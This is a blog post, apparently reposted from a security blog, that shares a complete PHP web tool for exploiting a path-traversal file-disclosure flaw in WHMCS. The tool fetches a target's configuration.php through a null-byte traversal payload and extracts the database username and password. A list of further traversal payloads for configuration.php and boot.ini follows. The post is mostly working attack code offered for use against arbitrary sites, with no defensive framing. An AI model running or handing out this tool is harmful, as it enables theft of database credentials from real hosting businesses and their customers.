
We decided to stop the project, “WHMCS LFD Exploiter” and decided to make a modification out of it in PHP. The function is still the same because it still gets the db_username and the db_password but what has been changed is that it is user friendly and allows the user to change and the payload.
Here is the full script:
<?php
/**
* [TPK] & [shipcode] - theprojectxblog.net
* WHCMS Cart Exploit Tool
* #projectx
* http://www.exploit-db.com/exploits/17999/
**/
# default payload
$payload = "cart.php?a=projectx&templatefile=../../../configuration.php%00";
# site checker
$sitecheck = "www.isup.me";
$check = '';
if(!empty($_GET['site']) && !empty($_GET['payload'])){
# yum yum!
$yum = array();
$payload = base64_decode($_GET['payload']);
$site = trim($_GET['site'],'/');
$http = stristr($site,'http://');
if($http){
$site = $http;
} else {
$site = "http://$site";
}
$exploit = "$site/$payload";
if ($stream = @fopen($exploit, 'r')) {
echo '<strong>' . $exploit . '</strong><br>';
$data = trim(stristr(stristr(stream_get_contents($stream), '<?php'), '?>', true), '<?php');
$data = explode(';',trim($data));
$data = array_filter($data);
foreach($data as $datum){
$datum = explode('=',$datum);
$yum[trim($datum[0])] = $datum[1];
}
echo '<pre>';
print_r($yum);
echo '</pre>';
# bug? causes apache to crash :O
// $pattern = '/<?php+(.|s)+?>/';
// preg_match($pattern, $data, $matches);
// var_dump($matches);
fclose($stream);
} else {
$check = "<a target='_new' href='http://$sitecheck/$site'>is target up?</a>";
}
}
?>
<html>
<head>
<title>WHCMS Exploit Tool</title>
<link rel="shortcut icon" type="image/jpg" href="http://www.theprojectxblog.net/wp-content/uploads/2011/10/cropped-297465_202385663163007_202385503163023_447971_677009595_a.jpg">
<style>
body, input { background: black; color: white; font-family: calibri; font-size: 1.1em; }
input[type=text] { width: 600px; } input { border: solid 1px white; }
span { display: inline-block; width: 60px; margin-right: 10px; }
a { text-decoration: none; color: red; } img { float: left; margin-right: 10px; }
</style>
<script>
var Base64 = {
// private property
_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// public method for encoding
encode : function (input) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;
input = Base64._utf8_encode(input);
while (i < input.length) {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
}
return output;
},
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9+/=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
// private method for UTF-8 encoding
_utf8_encode : function (string) {
string = string.replace(/rn/g,"n");
var utftext = "";
for (var n = 0; n < string.length; n++) {
var c = string.charCodeAt(n);
if (c < 128) {
utftext += String.fromCharCode(c);
}
else if((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128);
}
else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128);
}
}
return utftext;
},
// private method for UTF-8 decoding
_utf8_decode : function (utftext) {
var string = "";
var i = 0;
var c = c1 = c2 = 0;
while ( i < utftext.length ) {
c = utftext.charCodeAt(i);
if (c < 128) {
string += String.fromCharCode(c);
i++;
}
else if((c > 191) && (c < 224)) {
c2 = utftext.charCodeAt(i+1);
string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
i += 2;
}
else {
c2 = utftext.charCodeAt(i+1);
c3 = utftext.charCodeAt(i+2);
string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
i += 3;
}
}
return string;
}
}
</script>
</head>
<body>
<img src="https://www.theprojectxblog.net/wp-content/uploads/2011/10/cropped-297465_202385663163007_202385503163023_447971_677009595_a.jpg" />
<form method='get' onSubmit="javascript:payload.value = Base64.encode(payload.value);">
<span>target:</span> <input type='text' name='site' value='site u waNna f00k'/>
<?php echo $check; ?><br/>
<span>payload:</span> <input type='text' name='payload' value='<?php echo $payload; ?>'/>
<input type='submit' value='expl0!t' />
</form>
<!-- brgzkreclwwp -->
</body>
</html>
Payloads that may come in handy:
cart.php?a=projectx&templatefile=../../../configuration.php”clients/cart.php?a=projectx&templatefile=../../../configuration.php”submitticket.php?step=projectx&templatefile=../../../../../../../../../boot.iniclientarea.php?action=projectx&templatefile=../../configuration.phpreports.php?report=../../../../../../../boot.ini
For more information about this exploit check my previous article about it.
View full post on ProjectX Blog – Information Security Redefined
View full post on National Cyber Security » Computer Hacking

